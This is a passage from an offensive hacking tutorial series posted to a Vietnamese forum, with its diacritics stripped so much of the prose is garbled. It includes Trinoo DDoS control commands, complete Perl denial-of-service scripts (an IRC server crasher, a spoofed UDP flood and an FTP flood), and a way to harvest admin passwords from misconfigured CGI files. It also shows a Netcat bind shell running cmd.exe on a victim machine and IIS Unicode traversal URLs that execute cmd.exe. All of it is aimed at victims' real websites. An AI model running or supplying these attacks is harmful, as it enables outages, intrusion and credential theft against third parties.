killdead. bcast-----------------------------------------------------------Lit k danh sch tt c cc Broadcast c th khai thc . help [cmd] ---------------------------------------------------a ra danh sch cc lnh . mstop----------------------------------------------------------Ngng li cc cuc tn cng DOS . _ y l mt s lnh dng iu khin Trinoo Deadmons: CODE aaa pass IP----------------------------------------------------Tn cng n a ch IP xc nh . GI gi tin UDP (0-65534) n cng ca UDP ca a ch IP xc nh trong mt

khong thi gian xc nh c mc nh l 120s hay t 1->1999 s . bbb pass N----------------------------------------------------t thI gian gii hn cho cc cuc tn cng DOS . Shi pass--------------------------------------------------------Gi chui *HELLO* ti dnh sch Master Server c bin dch trong chng trnh trn cng 31335/UDP. png pass------------------------------------------------------Send chui Pong tI Master Server pht hnh cc lnh iu khin trn cng 31335/UDP. die pass-------------------------------------------------------Shutdown Trinoo. rsz N------------------------------------------------------------L kch thc ca b m c dng tn cng , n c tnh bng byte . xyz pass 123:ip1:ip3----------------------------------------tn cng DOS nhiu mc tiu cng lc . ( Da theo hng dn ca huynh Binhnx2000 ) Cn nhiu on m v cch ng dng DoS lm , cc bn chu kh tm hiu thm nh . Nhng ng tn cng lung tung , nht l server ca HVA , coi chng khng thu c hiu qu m cn b lock nick na . Thn . GOODLUCK!!!!!!!!!!!!!!!! Ht phn 6 Bi vit ca ANHDENDAY Firewall Chc nng chnh ca firewall l kim sot lung thng tin t gia Internet v Intranet.Thit lp c ch iu khin dng thng tin gia mng bn trong (Intranet) vmng

Internet.VD: Cho php hoc khng cho php nhng dch v truy cp ra ngoi (T Intranet ra Internet) hay t ngoi truy cp vo trong (Internet vo Intranet). Theo di lung d liu gia Internet v Intranet. Kim sot a ch truy cp , cm a ch no truy cp. Kim sot ngi s dng v vic truy cp ca ngi s dng. Kim sot ni dung thng tin lu chuyn trn mng. Tuy nhin firewall vn c mt s mt hn ch : Firewall khng thng minh nh con ngi c th c hiu tng lai thng tin v phn tch ni dung tt hay xu ca n.Firewall ch c th ngn chn s xm nhp ca nhng ngun thng tin khng mong mun nhng phi xc nh r cc a ch truy cp. Khng th ngn cn nhng cuc tn cng khng i qua n , nhng cuc tn cng bng d liu (data-drivent attack). Khng th r qut virus my tnh trn nhng d liu c chuyn qua n v s gia tng nhanh chng ca cc loi virus mi v c nhiu cch m ho d liu thot khi s kim sot ca firewall Mt s phn mm firewall : 1-SMTP Gateway-Proxy Server cho cng SMTP : Chng trnh SMTP Gateway c xy dng trn c s s dng 2 phn mm Smap v Smapd ,dng chng li s truy cp thng qua giao thc SMTP.Nguyn l thc hin l chn trc chng trnh Mail Server nguyn thy ca h thng , khng cho php cc h thng bn ngoi kt ni ti Mail Server v trong mng tin cy ca mail server thng c mt s quyn u tin kh cao.Trn HH Unix , chng trnh Mail Server c thc hin bi Sendmail (Send mail dng lm g th coi trn). Khi mt h thng xa kt ni ti cng SMTP , chng trnh smap s dnh quyn phc v v chuyn t th mc dnh ring v t USER-ID mc bnh thng (khng c quyn

u tin).Mc ch duy nht ca smap l i thoi SMTP vi cc h thng khc , thu lm mail , ghi vo a , ghi nht k v kt thc.Cn i vi Smapd , n s qut th mc ny thng xuyn , khi pht hin c mail s chuyn d liu cho Sendmail phn pht vo hm th c nhn hoc chuyn tip ti cc mail server khc . Nh vy , mt user l trn mng s khng kt ni c ti Mail Server v t c cc thng tin theo ng ny u c th kim sot c .Tuy nhin nhc im ca chng trnh ny l khng th gii quyt nhng vn nh l th nc danh hoc cc phng php tn cng bng ng khc. 2-FTP Gateway -Proxy Server dnh cho dch v FTP: Proxy Server dnh cho dch v FTP cung cp kh nng kim sot kh nng truy cp vo dch v FTP da trn a ch IP v Hostname , v cung cp quyn iu khin truy co th cp cho php tu chn kho hoc ghi nht k bt k lnh FTP no .Cc a ch ch ny cng c th tu chn c (cho php hoc b cm ).Tt c cc s kt ni v dung lng d liu chuyn qua u b nht k ghi li. FTP Gateway t bn thn n khng e da an tonh ca h thng bi v n chy root ti mt h mc rng v khng thc hin bt k th tc input/output file no ngoi vic c file cu hnh ca n .FTP Server ch cung cp dch v FTP m khng quan tm n vic ai c quyn hay khng c quyn dowload cc file .Do vy vic xc nh quyn phi c thit lp trn FTP Gateway v phi thc hin tr khi thc hin vic upload/download file. FTP Gateway c th ngn nga mi s xm nhp vo mng qua cng FTP mt cch kh linh hot (cho php ngn cn tng a ch hay ton b mng) v cng kim sot vic truy cp ti tng kh nng nh dowload /upload thng tin. 3-Telnet Gateway-Proxy Server cho Telnet : Telnet Gateway l mt proxy server qun l truy cp mng

da trn a ch IP , hostname v cung cp s iu khin truy cp th cp cho php tu chn kho bt k ch no. Tt c cc s kt ni d liu chuyn qua u c nht k ghi li.Mi ln user kt ni ti Telnet Gateway , user phi chn phng thc kt ni.Telnet Fateway khng lm hi ti h thng v n ch hot ng trong mt phm vi nht nh (c cho php).VD : H thng s chuyn quyn iu khin ti mt th mc dnh ring, ng thi cm truy cp ti nhng th mc v file khc. Telnet Gateway c s dng kim sot cc truy cp vo mng ni b.Cc truy cp khng c php s khng th thc hin c mt tc v no , cn nhng truy cp hp php s b nht k ghi li (thi gian truy cp , nhng tc v ) 4-HTTP Gateway Proxy Server dnh cho Web : Cm n s ng h ca cc bn v y l phn 7 42 . ) K thut n cng DoS vo WircSrv Irc Server v5.07 : _ WircSrv IRC l mt Server IRC thng dng trn Internet ,n s b Crash nu nh b cc Hacker gi mt Packet ln hn gi tr ( 65000 k t ) cho php n Port 6667. Bn c th thc hin vic ny bng cch Telnet n WircSrv trn Port 6667: Nu bn dng Unix: [hellme@die-communitech.net$ telnet irc.example.com 6667 Trying example.com... Connected to example.com. Escape character is '^]'. [buffer] Windows cng tng t:

telnet irc.example.com 6667 Lu : [buffer] l Packet d liu tng ng vi 65000 k t . Tuy nhin , chng ta s crash n rt n gin bng on m sau ( Cc bn hy nhn vo on m v t mnh gii m nhng cu lnh trong , cng l mt trong nhng cch tp luyn cho s phn x ca cc hacker khi h nghin cu . No , chng ta hy phn tch n mt cch cn bn ): CODE #!/usr/bin/perl #< == on m ny cho ta bit l dng cho cc lnh trong perl use Getopt::Std; use Socket; getopts('s:', \%args); if(!defined($args{s})){&usage;} my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$ proto); $foo = "A"; # y l NOP $number = "65000"; # y l tt c s NOP $data .= $foo x $number; # kt qu ca $foo times $number $serv = $args{s}; # lnh iu khin server t xa $port = 6667; # lnh iu khin cng t xa , n c mc nh l 6667 $buf = "$data"; $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print S "$buf"; print("Data has been successfully sent to $serv\n"); sub usage {die("\n\n Li WircSrv Version 5.07s

c th tn cng bng DoS \n gi 2 64k gi tin n server lm cho n crash.\n -s server_ip\n\n");} s dng ci m ny , bn hy save n vo mt file *.pl , rI down chng trnh activeperl v si , setup n ri vo HH DOS bn ch cn gi file ny ra theo lnh sau : C:\>perl < ng dn n file *.pl > ( n by gi ti s khng by tht cn k na m s tng dn kh ln , nu bn no nghin cu k cc bi trc th cc bn s lm c d dng thi ) 43 . ) K thut tn cng DoS vo my tnh s dng HH Win2000 : _ Mun s dng c n , bn phi c activeperl , ri s dng nh hng dn tng t trn . Save on m vo file *.pl rI dng lnh perl gi n ra : CODE #!/usr/bin/perl -w use Socket; use Net::RawIP; use Getopt::Std; getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/# #; print"--- $0 v.$ver b/ Nelson Brito / Independent Security Consultant --- "; $l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2; $v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64; $p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"get servbyname: $! "); ($o{'s'}&&$o{'d'})||die " Use: $0 [IP Options] [UDP Options] ",

"IP Options: ", " -s* ia chi nguon e bat chuoc ", " -d* ia chi bi tan cong ", " -v IP Version (def: $v) ", " -t IP Type of Service (TOS) (def: $t) ", " -f IP fragementation offset (def: $f) ", " -T IP Time to Live (TTL) (def: $T) ", "UDP Options: ", " -p cong cua may tinh nan nhan (def: $p) ", " -l chieu dai cua goi tin (def: $l) ", " -r cai at du lieu ngau nhien (def: ".") ", "Generic: ", " -n So luong goi tin ta muon gui i (def: $n) ", " -L gui goi tin lien tuc khong ngung cho en khi may tinh cua nan nhan bi die he he", " Bai huong dan cua ANHDENDAY . "; while($n > 0){ $|=1;print".";$sp=int rand 65535; $D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l; $nb=new Net::RawIP({ ip=> { version=>$v, tos=>$t, ttl=>$T, frag_off=>$f, saddr=>$o{'s'}, daddr=>$o{'d'} }, udp=> { source=>$sp, dest=>$p, len=>$l, data=>$D } });

$nb->send;undef $nb;!$o{'L'}&&$n--; } print"Finish! "; _ Khi gi ra bn hy chn tu chn ghi trong m DoS . Nh l ch dng cho Win2000 nh . 44 . ) K thut tn cng DoS d dng nht : _ Ti th mi ln mun tn cng bng DoS u dng chng trnh ny , n chng kn g c v d thc hin . By gi ti s chia s vi cc bn . _ Bn cn phi c Activeperl ( li l activepert ) ci sn , save on m sau vo file abc.pl : CODE #!/usr/bin/perl use IO::Socket; sub initiate { if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host> <port> <username> <password>\nVi du : perl abc.pl 127.0.0.1 21 anonymous me@\n";} $host = $ARGV[0]; $port = $ARGV[1]; $user = $ARGV[2]; $pass = $ARGV[3]; }; sub connecttoserver { print("Connect den host: $host\n"); $socket = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM

) || die "khong the connect den $host"; print "Connect thanh cong . Loggin vao...\n"; }; sub login { print "user $user\n"; print $socket "user $user\r\n"; $response = <$socket>; print "$response\n"; print "pass $pass\n"; print $socket "pass $pass\r\n"; $response = <$socket>; print "$response\n"; print "Logged in. Dang tan cong DoS doi phuong. Nhan CTRLC de ngung.\n"; }; sub doit { for (;; ){ print "retr a:/x\n"; print $socket "retr a:/x\r\n"; $response = <$socket>; print "$response"; } } initiate(); connecttoserver(); login(); doit(); _Nu bn tng qua lp trnh khi c on m bn s thy rng on m ny dng chnh thng tin t a A ca nn nhn tn cng nn nhn . N s dng vng lp khng c

gii hn t hm $socket "retr a:/x\r\n" . Khi mun kt thc bn ch cn nhn ctrl+C . _Cui cng l bn ch cn gi n ra thng qua lnh perl nh cc bi trn .VD : perl abc.pl http://www.xxx.com/ anonymous me trong User name v Password c th l bt k . Vy l coi nh cc bn bit tn cng DoS l nh th no ri phi khng ? ch l nhng cch tn cng DoS thng thng ( nhng hu qu th chng thng thng cht no ) , cn cc k thut DoS li hi khc nh DRDoS th cho cc bn nghin cu thm vy . N rt nguy him khi s dng lung tung nn dnh phn cho cc bn no thch v tht s mun nghin cu v n . Ti xin dng phn DoS ti y . 45 . ) T to cho mnh mt proxy si : _Trong cc cng vic nh tn cng DoS hay t nhp vo trang Web c trang b firewall th bn cn n proxy si . Do cc bn hy t to cho mnh mt ci proxy made in <yourname> si cho n oai . By gi hy lm cng ti . _ Trc ht bn ng k mt host min ph trang free.prohosting.com . Bn hy khai bo thng tin v bn trong cc nhp thng tin . Cui cng khi ng k xong bn s nhn c Mail t trang Web ny gi n , hy test n ly pass mc nh m n cho bn . _ Tip theo bn vo trang www.xav.com , ri nhp vo link install pha di dng ch Test - script Package( tui nh l c 2 ci tn mang ch script ny ) . Sau bn nhn "next" v nhn pha di ca trang ny c ch show all verdon , bn hy nhn vo . _ Tip tc bn nhn James Marshall ==>CGIscript ==>CGIproxy==>Next==>accept==> cho n khi bn thy mt ci bng c nhiu nhp thng tin . Bn hy nhp thng tin vo cc trang :

+ your Website : nhp a ch trang Web ca bn ng k trong prohosting.com . + FTP username : Bn nhp username m bn ng k trong prohosting.com . + FTP password : Bn nhp passwd m prohosting.com send v mail cho bn . + My ci cn li khng cn thit , bn nhp next tip tc . Ri nhn finish . + Cui cng n s cho bn a ch bn va to ci proxy , bn hy ghi nh n . Sau ny mi ln hnh ng th bn li em ra si . 46 . ) K thut ly pass thng qua li ca mt s Script : a . ) Calendar CGI Script : _ Mt trong s nhng scripts tm thy im yu l calendar scripts , n nm trong th mc cgi-bin/calendar, file config l file calendar.cfg cha administrator username v password thay i chn la cho scripts khi cn , ci ny c th tm thy cui file calendar.cfg , tuy nhin chng c m ho chng ta ch vic dng John The Ripper hay nhng cng c khc gii m n l xong : _file calendar.cfg thng t ti a ch sau : http://www.xxx.com/cgi-bin/calendar/calendar.cfg sau khi crack xong chng ta s n Admin Control Login vo a ch : http://www.xxx.com/cgi-bin/calen..._admin.pl?admin _ Vy l bn c c quyn admin ri . b . ) WebBBS Script : _WebAdverts Script l mt scripts cho php webmasters hin th nhng biu ng lun phin ( qung co chng hn )

hay thm vo trong trang Web , cui cng bn c th s dng kt hp password v username ci t banners to mt banner accounts mi , xo accounts view sensitive info, vv.vv _a ch passwd ca WebAdverts l : http://www.xxx.com/cgi-bin/advert/adpassword.txt sau khi gii m bn logging vo: http://www.xxx.com/cgi-bin/advert/ads_admin.pl login nh l script administrator . c . ) WWWBoard Script : _WWWBoard c file password c th tm thy trong pasword.txt , chng ta hy search n bng t kho cgibin/wwwebboard hoc webboard/password.txt . d . ) Mailmachine Script : _Mailmachine.cgi l mt webbased mailinglist , bn c th trng thy file adressed.txt cha tt c danh sch khch ng k , nhng danh sch c th thy ti nhng urls sau: http://www.xxx.com/cgi-bin/mailman/addresses.txt http://www.xxx.com/cgi-bin/maillist/addresses.txt http://www.xxx.com/cgi-bin/mail/addresses.txt bn cng nn tm addresses.txt m i khi chng c i thnh cc tn khc . Chng c th cha cc thng tin quan trng cho php bn khai thc . Vic tm ra cc trang b li ny hn cc bn bit , ti s khng nhc li na ( Nu ai cha bit th vui lng c lI nhng phn trc ) .

===================================== ================= Nhn y ti xin nh chnh li l trong cc on code m ti phn tch v post ln nhng phn trc ti s khng thm k hiu # vo trc nhng cu phn tch , dn n vic mt s bn thc mc l on code khng hot ng . Ti thnh tht xin li cc bn v s ca ti , cc bn ch cn ly on code ra v thm vo du # pha trc dng ch thch Ting Vit ca ti l c ( Thng thng ti c s dng du < == gii thch phi ui on code . Cc bn hy m fix nh . Chc vui v . GOOKLUCK!!!!!!!!!!!! Ht phn 7 . Bi vit ca ANHDENDAY y l phn 8 . 47 . ) Cc cng c cn thit hack Web : _ i vi cc hacker chuyn nghip th h s khng cn s dng nhng cng c ny m h s trc tip setup phin bn m trang Web nn nhn s dng trn my ca mnh test li . Nhng i vi cc bn mi vo ngh th nhng cng c ny rt cn thit , hy s dng chng mt vi ln bn s bit cch phi hp chng vic tm ra li trn cc trang Web nn nhn c nhanh chng nht . Sau y l mt s cng c bn cn phi c trn my lm n ca mnh : _ Cng c th 1 : Mt ci proxy dng che du IP v vt tng la khi cn ( Cch to 1 ci Proxy ti by phn 7 , cc bn hy xem li nh ) . _ Cng c th 2 : Bn cn c 1 shell account, ci ny thc s quan trng i vi bn . Mt shell account tt l 1 shell

account cho php bn chy cc chng trnh chnh nh nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...v shell account cn phi ci chng trnh GCC ( rt quan trng trong vic dch (compile) cc exploit c vit bng C) nh MinGW, Cygwin v cc dev tools khc. Shell account gn ging vi DOS shell,nhng n c nhiu cu lnh v chc nng hn DOS . Thng thng khi bn ci Unix th bn s c 1 shell account, nu bn khng ci Unix th bn nn ng k trn mng 1 shell account free hoc nu c ai ci Unix v thit lp cho bn 1 shell account th bn c th log vo telnet (Start --> Run --> g Telnet) dng shell account . Sau y l 1 s a ch bn c th ng k free shell account : http://www.freedomshell.com/ http://www.cyberspace.org/shell.html http://www.ultrashell.net/ _Cng c th 3 : NMAP l Cng c qut cc nhanh v mnh. C th qut trn mng din rng v c bit tt i vi mng n l. NMAP gip bn xem nhng dch v no ang chy trn server (services / ports : webserver , ftpserver , pop3,...),server ang dng h iu hnh g,loi tng la m server s dng,...v rt nhiu tnh nng khc.Ni chung NMAP h tr hu ht cc k thut qut nh : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP c nh gi l cng c hng u ca cc Hacker cng nh cc nh qun tr mng trn th gii. Mi thng tin v NMAP bn tham kho ti http://www.insecure.org/ . _ Cng c th 4 : Stealth HTTP Security Scanner l cng c qut li bo mt tuyt vi trn Win32. N c th qut c hn 13000 li bo mt v nhn din c 5000 exploits khc. _ Cng c th 5 : IntelliTamper l cng c hin th cu trc ca mt Website gm nhng th mc v file no, n c th lit k c c th mc v file c set password. Rt tin cho vic Hack Website v trc khi bn Hack mt Website th bn phi nm mt s thng tin ca Admin v Website . _ Cng c th 6 : Netcat l cng c c v ghi d liu qua

mng thng qua giao thc TCP hoc UDP. Bn c th dng Netcat 1 cch trc tip hoc s dng chng trnh script khc iu khin Netcat. Netcat c coi nh 1 exploitation tool do n c th to c lin kt gia bn v server cho vic c v ghi d liu ( tt nhin l khi Netcat c ci trn 1 server b lI ). Mi thng tin v Netcat bn c th tham kho ti http://www.l0pht.com/ . _ Cng c th 7 : Active Perl l cng c c cc file Perl ui *.pl v cc exploit thng c vit bng Perl . N cn c s dng thi hnh cc lnh thng qua cc file *.pl . _ Cng c th 8 : Linux l h iu hnh hu ht cc hacker u s dng. _ Cng c th 9 : L0phtCrack l cng c s mt Crack Password ca Windows NT/2000 . _ Cch Download ti by ri nn khng ni y , cc bn khi Download nh ch n cc phin bn ca chng , phin bn no c s ln nht th cc bn hy Down v m si v n s c thm mt s tnh nng m cc phin bn trc cha c . Nu down v m cc bn khng bit s dng th tm li cc bi vit c c hng dn bn Box ngh . Nu vn khng thy th c post bi hi , cc bn bn s tr li cho bn . 48 . ) Hng dn s dng Netcat : a . ) Gii thiu : Netcat l mt cng c khng th thiu c nu bn mun hack mt website no v n rt mnh v tin dng . Do bn cn bit mt cht v Netcat . b . ) Bin dch : _ i vi bn Netcat cho Linux, bn phi bin dch n trc khi s dng. - hiu chnh file netcat.c bng vi: vi netcat.c + tm dng res_init(); trong main() v thm vo trc 2 du "/": // res_init(); + thm 2 dng sau vo phn #define (nm u file): #define GAPING_SECURITY_HOLE #define TELNET

- bin dch: make linux - chy th: ./nc -h - nu bn mun chy Netcat bng nc thay cho ./nc, bn ch cn hiu chnh li bin mi trng PATH trong file ~/.bashrc, thm vo ":." PATH=/sbin:/usr/sbin:...:. _ Bn Netcat cho Win khng cn phi compile v c sn file nh phn nc.exe. Ch vy gii nn v chy l xong. c . ) Cc ty chn ca Netcat : _ Netcat chy ch dng lnh. Bn chy nc -h bit cc tham s: CODE C:\>nc -h connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [options] [hostname] [port] options: -d ----------- tch Netcat khi ca s lnh hay l console, Netcat s chy ch steath(khng hin th trn thanh Taskbar) -e prog --- thi hnh chng trnh prog, thng dng trong ch lng nghe -h ----------- gi hng dn -i secs ----- tr hon secs mili giy trc khi gi mt dng d liu i -l ------------- t Netcat vo ch lng nghe ch cc kt ni n -L ------------ buc Netcat "c" lng nghe. N s lng nghe tr li sau mi khi ngt mt kt ni. -n ------------ ch dng a ch IP dng s, chng hn nh 192.168.16.7, Netcat s khng thm vn DNS -o ------------ file ghi nht k vo file -p port ----- ch nh cng port -r yu cu Netcat chn cng ngu nhin(random) -s addr ----- gi mo a ch IP ngun l addr -t ------------- khng gi cc thng tin ph i trong mt phin

telnet. Khi bn telnet n mt telnet daemon(telnetd), telnetd thng yu cu trnh telnet client ca bn gi n cc thng tin ph nh bin mi trng TERM, USER. Nu bn s dng netcat vi ty chn -t telnet, netcat s khng gi cc thng tin ny n telnetd. -u ------------- dng UDP(mc nh netcat dng TCP) -v ------------- hin th chi tit cc thng tin v kt ni hin ti. -vv ----------- s hin th thng tin chi tit hn na. -w secs ---- t thi gian timeout cho mi kt ni l secs mili giy -z ------------- ch zero I/O, thng c s dng khi scan port Netcat h tr phm vi cho s hiu cng. C php l cng1cng2. V d: 1-8080 ngha l 1,2,3,..,8080 d . ) Tm hiu Netcat qua cc VD : _ Chp banner ca web server : V d: nc n 172.16.84.2, cng 80 CODE C:\>nc 172.16.84.2 80 HEAD / HTTP/1.0 (ti y bn g Enter 2 ln) HTTP/1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache-AdvancedExtranetServer/1.3.19 (LinuxMandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content-Type: text/html bit thng tin chi tit v kt ni, bn c th dng v ( vv s

cho bit cc thng tin chi tit hn na) C:\>nc -vv 172.16.84.1 80 CODE 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [172.16.84.1] 80 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache/1.3.20 (Win32) Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: "0-cec-3899eaea" Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text/html sent 17, rcvd 245: NOTSOCK Nu mun ghi nht k, hy dng -o <tn_file>. V d: nc -vv -o nhat_ki.log 172.16.84.2 80 xem file nhat_ki.log xem th n ghi nhng g nh : CODE < 00000000 48 54 54 50 0d # HTTP/1.1 200 OK. < 00000010 0a 44 61 74 46 # .Date: Fri, 04 F < 00000020 65 62 20 32 34 # eb 2000 14:50:54 < 00000030 20 47 4d 54 70 # GMT..Server: Ap < 00000040 61 63 68 65 6e # ache/1.3.20 (Win 2f 31 2e 31 20 32 30 30 20 4f 4b 65 3a 20 46 72 69 2c 20 30 34 20 30 30 30 20 31 34 3a 35 30 3a 35 0d 0a 53 65 72 76 65 72 3a 20 41 2f 31 2e 33 2e 32 30 20 28 57 69

< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes. < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length: < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm < 000000f0 6c 0d 0a 0d 0a # l.... du < ngha l server gi n netcat du > ngha l netcat gi n server _ Qut cng : Bn hy chy netcat vi ty chn z . Nhng qut cng nhanh hn, bn hy dng -n v netcat s khng cn thm vn DNS. V d scan cc cng TCP(1->500) ca host 172.16.106.1 CODE [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 443 (?) open (UNKNOWN) [172.16.106.1] 139 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open (UNKNOWN) [172.16.106.1] 80 (?) open

(UNKNOWN) [172.16.106.1] 23 (?) open nu bn cn scan cc cng UDP, dng -u CODE [dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 1025 (?) open (UNKNOWN) [172.16.106.1] 1024 (?) open (UNKNOWN) [172.16.106.1] 138 (?) open (UNKNOWN) [172.16.106.1] 137 (?) open (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open _ Bin Netcat thnh mt trojan : Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe, dng ty chn l ( listen ) v -p port xc nh s hiu cng cn lng nghe, -e <tn_chng_trnh_cn_chy> yu cu netcat thi hnh 1 chng trnh khi c 1 kt ni n, thng l shell lnh cmd.exe ( i vi NT) hoc /bin/sh(i vi Unix). V d: CODE E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error Trn my tnh dng tn cng, bn ch vic dng netcat ni n my nn nhn trn cng nh, chng hn nh 8080 CODE C:\>nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open

Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. E:\>cd test cd test E:\test>dir /w dir /w Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E:\test [.] [..] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 262,499 bytes 2 Dir(s) 191,488,000 bytes free C:\test>exit exit sent 20, rcvd 450: NOTSOCK Nh cc bn thy , ta c th lm nhng g trn my ca nn nhn ri , ch cn mt s lnh c bn , ta chim c my tnh ca i phng , cc bn hy xem tip nh : CODE E:\>nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 ...? ? Ring i vi Netcat cho Win, bn c th lng nghe ngay trn cng ang lng nghe. Ch cn ch nh a ch ngun l s<a_ch_ip_ca_my_ny>. V d: CODE netstat -a ... TCP nan_nhan:domain nan_nhan:0 LISTENING <- cng 53 ang lng nghe ...

E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lng nghe ngay trn cng 53 listening on [172.16.84.1] 53 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163? ? Trn Windows NT, t Netcat ch lng nghe, khng cn phi c quyn Administrator, ch cn login vo vi 1 username bnh thng khi ng Netcat l xong. Ch : bn khng th chy netcat vi ... -u -e cmd.exe... hoc ...-u -e /bin/sh... v netcat s khng lm vic ng. Nu bn mun c mt UDP shell trn Unix, hy dng udpshell thay cho netcat. ( Da theo bi vit ca huynh Vicky ) 49 . ) K thut hack IIS server 5.0 : _ IIS server vi cc phin bn t trc n phin bn 5.0 u c li ta c th khai thc , do by gi hu ht mi ngi u dng IIS server 5.0 nn li cc phin bn trc ti khng cp n . By gi ti s by cc bn cch hack thng qua cng c activeperl v IE , cc bn c th vn dng cho cc trang Web VN v chng b li ny rt nhiu . Ta hy bt u nh . _ Trc ht cc bn hy download activeperl v Unicode.pl . _ S dng telnet xc nh trang Web ta tn cng c s dng IIS server 5.0 hay khng : CODE telnet < tn trang Web > 80 GET HEAD / HTTP/1.0 Nu n khng bo cho ta bit mc tiu ang s dng chng trnh g th cc bn hy thay i cng 80 bng cc

cng khc nh 8080, 81, 8000, 8001 .v.v _ Sau khi xc nh c mc tiu cc bn vo DOS g : CODE perl unicode.pl Host: ( g a ch server m cc bn mun hack ) Port: 80 ( hoc 8080, 81, 8000, 8001 tu theo cng m ta telnet trc ) . _ Cc bn s thy bng lit k li ( c lp trnh trong Unicode.pl ) nh sau : CODE [1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+ [2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+ [3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ [4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+ [5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ [6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+ [7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ [8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ [9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+ [10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+ [11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c + [12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/ c+ [13]/scripts/..%fc%80%80%80%80%af../winnt/system32/c md.exe?/c+ [14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\% 80\%af../winnt/system32/cmd.exe?/c+ [15]/cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/ system32/cmd.exe?/c+ [16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+

[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+ [18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+ [19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+ [20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+ Cc bn s thy c tt c cc li trn nu trang Web nn nhn b tt c nhng li nh vy , nu server ca nn nhn ch b li th 13 v 17 th bng kt qu ch xut hin dng th 13 v 17 m thi . Ti ly VD l bng kt qu cho ti bit trang Web nn nhn b li th 3 v 7 , ti s ra IE v nhp on m tng ng trn Address : http://www.xxx.com/scripts/..%c1%pc../winnt/system32/c md.exe?/c+ < == li dng th 3 hoc http://www.xxx.com/scripts/..%c1%1c../winnt/system32/c md.exe?/c+ < == li dng th 7 n y cc bn c th xm nhp vo server ca nn nhn ri , cc bn hy s dng lnh trong DOS m khai thc thng tin trong ny . Thng thng cc trang 